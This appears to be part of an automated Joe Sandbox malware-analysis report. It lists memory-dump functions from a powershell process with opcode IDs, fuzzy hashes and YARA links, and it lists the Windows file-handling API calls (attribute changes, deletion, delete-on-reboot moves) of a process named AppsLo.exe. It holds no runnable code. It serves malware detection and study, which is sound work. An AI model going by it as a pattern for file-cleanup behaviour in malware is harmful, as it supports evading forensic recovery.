
Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2af9369db0f2e819049aeac81219042a98e915e30c0df2a3ba2c6ce0e158b302
Instruction ID: 8607d4aaf496f16e839a3eed1bb9c91ed8a13e159000edabe5df73a0b1bbf623
Opcode Fuzzy Hash: 2af9369db0f2e819049aeac81219042a98e915e30c0df2a3ba2c6ce0e158b302
Instruction Fuzzy Hash: 1C01D2356087849FD718DB35D494A997FF1EF45210F1484EED14AC76A2DB30F845C740

Function 0298F027 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119116574.000000000298D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0298D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_298d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1baa4135a3ffa84b7eafa0616a1ffb5636ea4d9d3a95b2124a7f7c9932413226
Instruction ID: 2e8c30425323870db69855fc03c2ed7d23cc25345d5826f989f3f6120461409f
Opcode Fuzzy Hash: 1baa4135a3ffa84b7eafa0616a1ffb5636ea4d9d3a95b2124a7f7c9932413226
Instruction Fuzzy Hash: 11119D7A504284DFCB15DF14D5C4B15BFA1FB84328F28C6AAD8494BA56C33AD44ACB61

Function 041AF3D0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac962b5b929a6407bcee1e7362cedfbfbfb940fd47319baf341b7174002654d
Instruction ID: 340bdef01124e4c8849bdbe775e623ff07df65239cf93bf96a555cee211cf1e7
Opcode Fuzzy Hash: bac962b5b929a6407bcee1e7362cedfbfbfb940fd47319baf341b7174002654d
Instruction Fuzzy Hash: 74110934204754CFC728DF75D084896B7F6EF8931572489ADD44A87BA0CB32F845CB50

Function 041ADE98 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 690942fddf12960d317c4cc44e426190af41f2feea0928ff3560b95d45236c10
Instruction ID: 2f0c7ba5a1d4efd0f16bf76a6f9f1c6af391ad203c80c0d6d93bb7deac81dd6a
Opcode Fuzzy Hash: 690942fddf12960d317c4cc44e426190af41f2feea0928ff3560b95d45236c10
Instruction Fuzzy Hash: F5017535700218DFCB119F74ED486AEBBF5FB88325F144069E51AD3341DB36A911CBA1

Function 041ABF10 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e22f16ddc2a45c3813b643dc0aba9436b5e8e58c5ff66b202722f6232c958a7a
Instruction ID: 26a59f26839351b7962ce5b914ceb9293d86e35da629c3f9703412f1372b3ed7
Opcode Fuzzy Hash: e22f16ddc2a45c3813b643dc0aba9436b5e8e58c5ff66b202722f6232c958a7a
Instruction Fuzzy Hash: EDF0C8313093A45FD7018A799C549F7BFEDEF8666071441ABF944C7362DA70CD0487A0

Function 0298D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119116574.000000000298D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0298D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_298d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0154ab02f797da3f32b5bfdde702f6a47a893e6170f526fb9a814d3c501624e
Instruction ID: 6c1322128e7217a43501c3f5a01bb749be6683ca97194052c04e34634924f652
Opcode Fuzzy Hash: b0154ab02f797da3f32b5bfdde702f6a47a893e6170f526fb9a814d3c501624e
Instruction Fuzzy Hash: AF01F2724093449AE7106E35DD80B66BF9CDF41324F1CC41AED494A282CBB99945C6B2

Function 0298D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119116574.000000000298D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0298D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_298d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4b04b0d69cd5a8d6fc0d7e73131a9d8239a5b47dd24694586a9e4898ea5111e
Instruction ID: c99d58f60449c2173409bf1d8ff1224a1aa8bb88e2d33a8068c2afe7606823d5
Opcode Fuzzy Hash: e4b04b0d69cd5a8d6fc0d7e73131a9d8239a5b47dd24694586a9e4898ea5111e
Instruction Fuzzy Hash: E7014C6240E3C09FE7128B358D94B62BFB8DF43224F1D80CBD9888F5A3C2695849C772

Function 041ADC88 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1731798b0ebed7816655f9e1e3bb9624d15dd265abcad8d697fd1ca89ad9807
Instruction ID: f982a39dcdb199fc1fbe2a540c2caa329d73f3b029b3737ae9a7bf8422d4d230
Opcode Fuzzy Hash: b1731798b0ebed7816655f9e1e3bb9624d15dd265abcad8d697fd1ca89ad9807
Instruction Fuzzy Hash: 5CF0E93A705A5857C71AA65DBC104EE7B9BDAC52B130144AFE109C7B40DF54A91543F2

Function 041A7958 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f51054f8da86b2a09fcc953ffafedeed8a45f49e23e860e36a3a3f6b691864b
Instruction ID: a8cbc156ce1bb3c6d01f983eb2e6a0001560997825a3248274c50e8fe9f74d8f
Opcode Fuzzy Hash: 7f51054f8da86b2a09fcc953ffafedeed8a45f49e23e860e36a3a3f6b691864b
Instruction Fuzzy Hash: 20F02835609380AFC7128B75A84096F7FE5DFCA26170409AED089C7391CE745C56C771

Function 041A90D8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d8f21880e06ccacfcbb2bf7b1817abfdd14f24481dc59085ac17850ab46dc16
Instruction ID: 6c553259aa2ca976976eb62e90755860170d1e396dc89e6c6cbefc2b63e32a71
Opcode Fuzzy Hash: 8d8f21880e06ccacfcbb2bf7b1817abfdd14f24481dc59085ac17850ab46dc16
Instruction Fuzzy Hash: 25F046766052445BE301BB34D8043EBBBA6DFC1324F14819BC8095B382DE3A2D06CBE1

Function 0298D9A7 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119116574.000000000298D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0298D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_298d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 467832563d60d5dbfc549f741cc6c1912ab143390d256e18277b552a16562ff5
Instruction ID: d0289ca062418c84d6e62c2b8a38f1b0215e734297a519803c6ff3c1db7b03a7
Opcode Fuzzy Hash: 467832563d60d5dbfc549f741cc6c1912ab143390d256e18277b552a16562ff5
Instruction Fuzzy Hash: 5DF0F976200604AF97209F0AD985C27FBADEBD4670719C59AE84A8B655C772EC41CAB0

Function 041A9158 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab0fbeed36131c0ac53953ca7bbb18b1b680f28ef107fe85b4ea808233926bb
Instruction ID: d8d316f5728adc8430b7e5cb8aba109ff0317c2196d1de962fae85e9dfbc90a5
Opcode Fuzzy Hash: dab0fbeed36131c0ac53953ca7bbb18b1b680f28ef107fe85b4ea808233926bb
Instruction Fuzzy Hash: EFF082755063044FD361AB78E8997DABFE5EB41370F0088AAE54EC7381DB397985CBA0

Function 041ADE38 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2004b8ab40fa544529a053a2dc6f38b3df97330b223557addaffa9f4ff20c294
Instruction ID: b92ebf2c937c6c132a8c68bccc4bf2f5cbb3f1922e6463a211650861d182902c
Opcode Fuzzy Hash: 2004b8ab40fa544529a053a2dc6f38b3df97330b223557addaffa9f4ff20c294
Instruction Fuzzy Hash: D5F082393046408FC3119F2DE494CA6BBFAEFCA61431900DAE185CBB32DA61DC11CB91

Function 041A8969 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ed3843637c6a2db94fea6db72609bf051817d00c084e85e78e6cc737faa281
Instruction ID: 65052f6a084e4eb83d60a8260abd7ee89304142953fec98aa8e60c8e88d4fcea
Opcode Fuzzy Hash: b6ed3843637c6a2db94fea6db72609bf051817d00c084e85e78e6cc737faa281
Instruction Fuzzy Hash: 5EF0E23A30D2904BC70B2735A8182ED3F61ABC6730B08406BD50587282CE2C190983F5

Function 041A7968 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179e35611e5e8acc0b4d699ee4e34da31b8dbac442e623e907ed8e97e4390705
Instruction ID: da69cf658fa64c91243bfa7ef8b3414453126359560090ba658babfb2dde8c21
Opcode Fuzzy Hash: 179e35611e5e8acc0b4d699ee4e34da31b8dbac442e623e907ed8e97e4390705
Instruction Fuzzy Hash: E9F0A732700614AFD7149B69E884A6FB7EAEFC8671B00052DE149D3340DF70AD5287A4

Function 0298D998 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119116574.000000000298D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0298D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_298d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c223d88b51ffbd91e24352c48d37eeb315fcfa056190e00f6802e596c14eb16
Instruction ID: 509be6418a9c331c361d5bf81b3ca6ca6494e6af792873d38a2a6d98c7aaf369
Opcode Fuzzy Hash: 1c223d88b51ffbd91e24352c48d37eeb315fcfa056190e00f6802e596c14eb16
Instruction Fuzzy Hash: A0F01275100640AFD715CF16CD85D23BBB9EBC5664B198589E84A4B752C771FC41CF70

Function 041A7697 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb92bc01c8a0bf9583d24242b20278d30e3d1150a1eb56f639f82353c9de354
Instruction ID: 19d5084914e4667c28b61233cb3a5c98bba01e178b8493ec508334bde7bf257a
Opcode Fuzzy Hash: 1cb92bc01c8a0bf9583d24242b20278d30e3d1150a1eb56f639f82353c9de354
Instruction Fuzzy Hash: D8F0A079B001088FDB00EBBCD840AAA7BE6EFC8751B194195E51DCB391DF24DC128B91

Function 041A90E8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19dcf2d29031d71fd00a9f0180650f76fc35aae484c7534b9c80f94d84f1ba6f
Instruction ID: 64f0467c50dfae49c3e685e58ed7d0c39e79221af45e8034ad2268012c1c3965
Opcode Fuzzy Hash: 19dcf2d29031d71fd00a9f0180650f76fc35aae484c7534b9c80f94d84f1ba6f
Instruction Fuzzy Hash: 9CF027B57005045BE344BB75C4483ABB7A6DBC0714F20816EC91A57384DE3A2C06CBE0

Function 041AAF88 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d7253c3b04e6d724eceb17263ccf461f8e09e25417d0bb9b739723b8df5bd3
Instruction ID: a8a6724704d88bea3d45572e82724dc5f77a47d7fec4506254b7b5c528c743a1
Opcode Fuzzy Hash: 51d7253c3b04e6d724eceb17263ccf461f8e09e25417d0bb9b739723b8df5bd3
Instruction Fuzzy Hash: 9AE0DF3631A3D507CB1AD12D7C600EAEF678AC71B030882FBE040CB242DD12991283E2

Function 041ADE48 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672fce82e341889f15737a76c11bafa29f2a69c05999777f47dc949b6fe54bf0
Instruction ID: a35b22105ab04b844aa1f9167eb387a8425a80b634bf839701e3e9514427e3f6
Opcode Fuzzy Hash: 672fce82e341889f15737a76c11bafa29f2a69c05999777f47dc949b6fe54bf0
Instruction Fuzzy Hash: 6FE01A393005108F83109F1DE498C6AB7FAEFCE76571900AAE549CB731DB61EC11CB91

Function 041A9549 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca54ed9b0694d9d4afccc688210104dba1b3d57b5b36e026b0453ed3fed04d1a
Instruction ID: 476db18ba8eb905f3344d30babad1d983efd451855256ebbf87fc62922808ce7
Opcode Fuzzy Hash: ca54ed9b0694d9d4afccc688210104dba1b3d57b5b36e026b0453ed3fed04d1a
Instruction Fuzzy Hash: 88D02B9E71111523115431FA18806FBD5CF8EC00B4704023BDA04C3701EE41EC2A03E2

Function 041A8739 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93317e5e4a7e4aab4e127322ea4fc85e42c15a754346f22a84e67b7cf8ae4f38
Instruction ID: 04c8651fc637183e90b7f036d902256cae06d2f6d939863414c39cba276f5981
Opcode Fuzzy Hash: 93317e5e4a7e4aab4e127322ea4fc85e42c15a754346f22a84e67b7cf8ae4f38
Instruction Fuzzy Hash: 5AE0863580924D8BCB08FBB4F80B4FDFF30FB14321B4042AAD94392680EA312A56CBD1

Function 041A9168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d82befbf0f799cdf068aa5f05ba72b262d4258c8e4f0a394aa20ac8437cbf7
Instruction ID: f9eef13ccd94bf734fee91d524d7c62bd01c0d3060a367b46b1af7093ff77448
Opcode Fuzzy Hash: 71d82befbf0f799cdf068aa5f05ba72b262d4258c8e4f0a394aa20ac8437cbf7
Instruction Fuzzy Hash: 65F0ED709053045BD764AFB9D89D79A7BE5FB44360F004869E55ED7340DB3968848BA0

Function 041A8800 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edfd8c1bcb5108aa6e267b2e913f29a35ad5257324801739665e86cfa234fc42
Instruction ID: 42f0ec9f4ce6abf9ab4059cd038a37688edf8e787448389ef5470c6f083a354b
Opcode Fuzzy Hash: edfd8c1bcb5108aa6e267b2e913f29a35ad5257324801739665e86cfa234fc42
Instruction Fuzzy Hash: E4E0807590930E8FC704EB64E8865E9FFB5AB44315F004166DD0597780EB305855DBD1

Function 041A8978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04104909cac6519e7430652904f13fe14f27932a2ac7a77e6ecc0ba69ff17e37
Instruction ID: cbfbbd495b4e40f1b5b3e8dd0f35247142d9fe748b74f8baff86eb954c874f97
Opcode Fuzzy Hash: 04104909cac6519e7430652904f13fe14f27932a2ac7a77e6ecc0ba69ff17e37
Instruction Fuzzy Hash: 74E0263570821047CB093B78A80C2AE7A96FBC8734F04002AD60A83340CF7C281183F9

Function 041A9550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d650beb3afb5837a38bd07190d85d9dee34aaa337538d0e7f59f3883a07818a0
Instruction ID: 605577b2ff69ec0280e30626bc036c3bc24ab4bafd37fe8f84bff78af2ffb96c
Opcode Fuzzy Hash: d650beb3afb5837a38bd07190d85d9dee34aaa337538d0e7f59f3883a07818a0
Instruction Fuzzy Hash: 97D0A79A71212527169435FE18806FBD5CF8EC44A4705067BDA09C7345EF41EC3A03E1

Function 041ADC98 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecaa3446c2e5253df6608c6725b2693116c36ed1192da35ff858679b48109576
Instruction ID: a52af4910e5b699a019c644138440c44736ba872047602084748b61c6322c03d
Opcode Fuzzy Hash: ecaa3446c2e5253df6608c6725b2693116c36ed1192da35ff858679b48109576
Instruction Fuzzy Hash: 7AE0C235700A14478319BA6EF80085F7BDBDFC4675354406EE11AC7704EFA8EC0247E5

Function 041ADCE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 4c1dc081fa8f933a18503c4a88896e4edbda27d3b61d7e387e616c0131ed2d63
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: E6E08635B10014978B0C995DE4504EDF7AADBCC220F04807AD90AA7740DF32691586E1

Function 041AF448 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bb342e34b9f2513695a5b1219e20d6ffa5c213378f0e79845cbf94087a683f
Instruction ID: 010ff8704f1b4e70474484f4754af8d2b520f84d0dccc511e2a08402a7546391
Opcode Fuzzy Hash: b0bb342e34b9f2513695a5b1219e20d6ffa5c213378f0e79845cbf94087a683f
Instruction Fuzzy Hash: 6BE01A74D452499F8780DFBC88815AAFFF4EF49200F2085EA9958D7211E73196129BA2

Function 041AF458 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 520364484d4775f2f0d65f7ec72a619954c0184fb6aa2345e0a40ac7cd84cd3c
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 47D06274D042099F8784DFADD94156DFBF4EB48200F5085AA891DD7301F73156128BD1

Function 041A8748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e199e56a0f1b789c43a4e2ff0632cab6b2a1b2d6ee690c6b454f2706515c0134
Instruction ID: d84089145e5ca9af56de779c3c4a06080fa715da68f598af837313348fbee05f
Opcode Fuzzy Hash: e199e56a0f1b789c43a4e2ff0632cab6b2a1b2d6ee690c6b454f2706515c0134
Instruction Fuzzy Hash: C0D017308041098BCB08FBA4E85B4BDBB34FB18311F400169D90752290EB352A5ACAD0

Function 041A8810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed8c34aad6ac46a7bc0656eae9d56100959923068a85d44c97558c3706c7dde
Instruction ID: ac2ebe400be2dee399504486163ddafc490f55ec1686ba1feef2f9e281f7d127
Opcode Fuzzy Hash: 8ed8c34aad6ac46a7bc0656eae9d56100959923068a85d44c97558c3706c7dde
Instruction Fuzzy Hash: 74D01774A0820A8BCB48EFA4E88686EBBB5AB48300F004169ED0993380EA346811CBD1

Function 041A7EA0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47cb0142c3aa5ec20de144ecd15cef68e67579bc830b5801cd49e317d8e195d9
Instruction ID: 6293950a489abd874b72acfca0e3f0e57cbdbaff1356171f9633dff98d32731b
Opcode Fuzzy Hash: 47cb0142c3aa5ec20de144ecd15cef68e67579bc830b5801cd49e317d8e195d9
Instruction Fuzzy Hash: 45C0021251E3C05FEB4786315C661153F71895351470A89E2D8918B0A3CC18881ACB62

Function 041A7938 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ff1eab0b9192f9bf410cd0c94d071f230d816e54b94aa4659edc1a4102f816
Instruction ID: cbd7cc506a1e7b455eb3dfcf3e50fde5e73fbba06f96df6a6e9846ffa8f896c4
Opcode Fuzzy Hash: 88ff1eab0b9192f9bf410cd0c94d071f230d816e54b94aa4659edc1a4102f816
Instruction Fuzzy Hash: 16C0123C1493849FC7064B3494508947F159F9115431104DDE4561A5B3D673D595CF00

Function 041A7940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2119322674.00000000041A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_41a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf72bd6140dcd6d015a08444346e48760101059e1aaa7916272c44401486892d
Instruction ID: b5607759b6ae63485f3fa569e68756a9c7dd908dd3a7c255bd81827e03381691
Opcode Fuzzy Hash: bf72bd6140dcd6d015a08444346e48760101059e1aaa7916272c44401486892d
Instruction Fuzzy Hash: 34B092301857488FC2496F75A804814B32DAF4421538004A8E84E1A2A28EB7E8D4CA44

Non-executed Functions

Function 082C3E98 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2128349878.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_82c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5bf8f46981271b64788d14f01a7fb1f81df0eb75731c834657b393d525cf7e
Instruction ID: be26367fef94941edc62c39edb4e7b501ab60abb2b4cb6109154ec8e0750138d
Opcode Fuzzy Hash: cd5bf8f46981271b64788d14f01a7fb1f81df0eb75731c834657b393d525cf7e
Instruction Fuzzy Hash: 59E16B707102059FEB18DF35C854BAABBF1BF84305F148A6DD406DB3A1EB76E9468B90

Analysis Process: AppsLo.exePID: 2032, Parent PID: 4824COMMON

Executed Functions

Function 008A3CC4 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 320
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 008A3D40
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A3D53
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 008A3D9E
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A3DA8
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 008A3DF6
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A3E00
FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 008A3E53
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A3E64
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 008A3F3E
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 008A3F52
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 008A3F79
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 008A3F9C
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 008A3FB5
